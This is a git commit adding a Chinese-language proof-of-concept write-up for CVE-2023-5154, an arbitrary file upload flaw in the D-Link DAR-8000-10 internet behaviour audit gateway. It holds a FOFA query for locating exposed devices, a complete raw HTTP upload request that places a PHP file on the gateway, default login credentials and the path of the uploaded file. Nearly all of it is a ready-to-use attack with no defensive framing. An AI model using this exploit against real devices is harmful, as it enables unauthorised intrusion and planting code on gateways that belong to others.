Create D-Link_DAR-8000-10上网行为审计网关任意文件上传漏洞(CVE-2023-5154).md

2024-03-15 14:01:08 +08:00 · 2024-03-15 14:01:08 +08:00 · 1f7f1fcd5f
commit 1f7f1fcd5f
parent 93fbf4a11c
1 changed files with 45 additions and 0 deletions
--- a/D-Link_DAR-8000-10上网行为审计网关任意文件上传漏洞(CVE-2023-5154).md
+++ b/D-Link_DAR-8000-10上网行为审计网关任意文件上传漏洞(CVE-2023-5154).md
@ -0,0 +1,45 @@
+## D-Link_DAR-8000-10上网行为审计网关任意文件上传漏洞(CVE-2023-5154)
+
+
+## fofa
+```
+body="DAR-8000-10" && title="D-Link"
+```
+![image](https://github.com/wy876/POC/assets/139549762/0604d3f1-2325-4ef2-9ba3-cfbe182da07d)
+
+## poc
+```
+POST /sysmanage/changelogo.php HTTP/1.1
+Host: 
+Cookie: PHPSESSID={登陆获取}
+Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
+Accept-Language: zh-CN
+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1) AppleWebKit/531.32.3 (KHTML, like Gecko) Version/4.1 Safari/531.32.3
+Content-Type: multipart/form-data; boundary=---------------------------7e62f02f51878
+Accept-Encoding: gzip, deflate
+Content-Length: 326
+Cache-Control: no-cache
+Connection: close
+
+-----------------------------7e62f02f51878
+Content-Disposition: form-data; name="file_upload"; filename="phpinfo.php"
+Content-Type: application/octet-stream
+
+<?php phpinfo()?>
+-----------------------------7e62f02f51878
+Content-Disposition: form-data; name="mode"
+
+upload
+-----------------------------7e62f02f51878--
+```
+
+需要登录
+```
+test/admin@123
+admin/admin
+```
+
+![fb11b0e63a546ac5943d60d5237d8d77](https://github.com/wy876/POC/assets/139549762/24555069-a601-4295-864b-0ad930ce515e)
+
+文件路径：
+`/boot/web/upload/diylogo/phpinfo.php`